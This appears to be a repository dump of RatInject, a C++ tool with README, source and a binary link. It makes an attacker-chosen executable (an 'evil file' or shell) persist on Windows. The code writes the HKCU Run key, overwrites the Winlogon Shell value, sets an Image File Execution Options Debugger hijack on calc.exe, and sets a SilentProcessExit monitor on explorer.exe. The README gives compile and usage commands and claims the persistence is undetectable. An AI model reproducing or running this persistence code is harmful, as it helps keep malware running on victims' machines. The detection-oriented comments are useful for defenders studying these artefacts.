├── README.md ├── persistence.cpp └── ratinject.exe /README.md: -------------------------------------------------------------------------------- 1 | # RatInject 2 | Rat Inject is C++ Executable to gain Undetectable Persistence in Windows via 4 Registry Keys 3 | 4 | # How Works? 5 | 6 | This tool gains persistence of an executable in Windows by exploiting 4 different internal Windows registries: 7 | 8 | - RunKey 9 | - WinLogon 10 | - Image File Execution Options (Open) 11 | - Image File Execution Options (Close) 12 | 13 | **Runkey:** 14 | 15 | Run Register, this register are one of the most important in Windows system, this register is execute many times during operation, but especially when you start the machine. 16 | 17 | **WinLogon:** 18 | 19 | Winlogon is a Windows component which handles various activities such as the Logon, Logoff, loading user profile, shutdown, lock screen... This execute your exe every time than user Logon, Logoff, loading user profile during authentication, shutdown, lock screen and more... 20 | 21 | **Image File Execution Options (Open):** 22 | 23 | This way allow you to execute your binary when user open any defined process or binary. In this case i cexecute exe when user open calc.exe process. 24 | 25 | **Image File Execution Options (Close):** 26 | 27 | This way allow you to execute your binary when user close any defined process or binary. In this case i execute exe when user finish explorer.exe process. 

# Compile

To compile this you need to execute this command in Linux machine:

x86_64-w64-mingw32-g++ persistence.cpp -o ratinject.exe -static-libstdc++ -static-libgcc -fpermissive

![image](https://user-images.githubusercontent.com/79543461/204348350-3f271288-daea-4dc5-aee4-882e143802b4.png)

# Use

To use this tool you have to execute the command with its parameters as follows:

Ways:

- Winlogon
- Run
- Open
- Close



Recommended:

**ratinject.exe C:\temp\shell.exe Run Open Close**

Winlogon can create bugs in OS.



All Ways (shell.exe is evil file to execute with persistence (absolut path)):

**ratinject.exe C:\temp\shell.exe All**



Only One:

**ratinject.exe C:\temp\shell.exe Winlogon/Run/Open/Close**



Or mix (example, you can use all possible mixes):

**ratinject.exe C:\temp\shell.exe Run Open Close**

-------------------------------------------------------------------------------- /persistence.cpp: --------------------------------------------------------------------------------
// persistence.cpp
//
// Registers a caller-supplied executable path (argv[1]) in several Windows
// auto-start locations. Each routine below touches exactly one location; the
// key paths and value names it writes are the registry artefacts that a
// baseline diff or registry-write monitoring control would observe.
// All HKLM routines need an elevated process; failures are ignored and every
// routine returns 0 unconditionally, so no outcome is reported to main().
//
// NOTE(review): the header names were lost in extraction — the four #include
// lines below are empty as shown on the page.
#include
#include
#include
#include

// tita and exe2 are never referenced in this file.
char* tita;
// Payload path; set once from argv[1] in main() and read by every routine.
const char* exe;
const char* exe2;

using namespace std;

// register run
// Writes REG_SZ value "salsa" = <payload path> under
// HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (per-user hive, so no
// elevation is required). The fixed value name is a straightforward artefact.
// A failed RegOpenKeyEx simply skips the write; RegSetValueEx's result is
// not checked.
int runkeys(const char* exe) {
    HKEY hkey = NULL;

    LONG res = RegOpenKeyEx(HKEY_CURRENT_USER,(LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hkey);
    if (res == ERROR_SUCCESS) {
        RegSetValueEx(hkey,(LPCSTR)"salsa", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
        RegCloseKey(hkey);
    }
    return 0;
}

//winlogon
// Overwrites the "Shell" value under
// HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon with the payload
// path, i.e. it replaces whatever the user shell value held before — which is
// why the README warns that this option "can create bugs in OS".
// Machine hive: without elevation RegOpenKeyEx fails and nothing is written.
int winlogon(const char* exe){
    HKEY hkey = NULL;

    LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 0, KEY_WRITE, &hkey);
    if (res == ERROR_SUCCESS) {
        RegSetValueEx(hkey,(LPCSTR)"Shell", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
        RegCloseKey(hkey);
    }

    return 0;
}

//execute exe when open app
// Unlike the other routines this one shells out twice via system(), so it
// produces a visible child process chain (this binary -> command interpreter
// -> copy / reg.exe) rather than direct registry API calls:
//   1. copies C:\Windows\system32\calc.exe to C:\Windows\system32\_calc.exe;
//   2. runs "reg add" to set the Image File Execution Options "Debugger"
//      value for calc.exe to a "cmd /C" chain that starts _calc.exe and then
//      the payload path, which is appended to the command string by plain
//      concatenation.
// Both steps write to protected locations and therefore need elevation;
// neither return code from system() is checked.
int open(string exee){
    string tititi = "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\calc.exe\" /v Debugger /t reg_sz /d \"cmd /C _calc.exe & " + exee + " /f";
    const char* command = tititi.c_str();

    system("copy C:\\Windows\\system32\\calc.exe C:\\Windows\\system32\\_calc.exe");
    system(command);
    return 0;
}

// Installs the explorer.exe "close" trigger described in the README by
// creating (RegCreateKeyEx, so the keys need not pre-exist) two HKLM keys:
//   - ...\Image File Execution Options\explorer.exe : GlobalFlag = 512 (0x200)
//   - ...\SilentProcessExit\explorer.exe : ReportingMode = 1,
//                                          MonitorProcess = <payload path>
// Each key is handled independently — a failure on the first does not stop
// the second. HKLM again, so this is a no-op without elevation.
int close(const char* exe) {
    HKEY hkey = NULL;
    DWORD gF = 512;   // written as GlobalFlag
    DWORD rM = 1;     // written as ReportingMode

    const char* img = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe";
    const char* silent = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\explorer.exe";

    LONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL);
    if (res == ERROR_SUCCESS) {
        RegSetValueEx(hkey, (LPCSTR)"GlobalFlag", 0, REG_DWORD, (const BYTE*)&gF, sizeof(gF));
        RegCloseKey(hkey);
    }

    res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)silent, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL);
    if (res == ERROR_SUCCESS) {
        RegSetValueEx(hkey, (LPCSTR)"ReportingMode", 0, REG_DWORD, (const BYTE*)&rM, sizeof(rM));
        RegSetValueEx(hkey, (LPCSTR)"MonitorProcess", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
        RegCloseKey(hkey);
    }

    return 0;
}

// Entry point: argv[1] is the payload path, argv[2..] are option words.
// The path is stored before the argument count is checked; with fewer than
// three arguments the help text is printed, but the option loop still runs
// over whatever argv[1..] holds. Option words are matched against the two
// spellings listed in each branch; anything else is ignored without a
// message. "All" invokes all four routines. The exit status is always 0.
int main (int argc, char** argv){
    exe = argv[1];
    if (argc <= 2) {
        cout<<"\n\tHelp Menu\n\tcreated by salsa\n\n\tOptions:\n\t1- Run\n\t2- Open\n\t3- Close\n\t4- WinLogon\n\t5- All\n\n\tUsage:\n\tratinject.exe evil.exe persistence-options\n\n\tRecommended Example:\n\tratinject.exe evil.exe Open Run Close\n";
    }
    for (int i = 1; i < argc; ++i) {
        if (argv[i] == string("All")) {
            runkeys(exe);
            open(exe);
            close(exe);
            winlogon(exe);
        }
        else if (argv[i] == string("Winlogon") || argv[i] == string("winlogon")) {
            cout<<"Executing WinLogon Persistence...";
            winlogon(exe);
        }
        else if (argv[i] == string("Open") || argv[i] == string("open")) {
            cout<<"Executing Image Options Persistence...";
            open(exe);
        }
        else if (argv[i] == string("Close") || argv[i] == string("close")) {
            cout<<"Executing Image Options Persistence...";
            close(exe);
        }
        else if (argv[i] == string("Run") || argv[i] == string("run")) {
            cout<<"Executing Runkeys Persistence...";
            runkeys(exe);
        }
    }
    return 0;
}
-------------------------------------------------------------------------------- /ratinject.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RatInject/dbcebd4ee35b0fd57ce3835237168a9d13d5ad10/ratinject.exe --------------------------------------------------------------------------------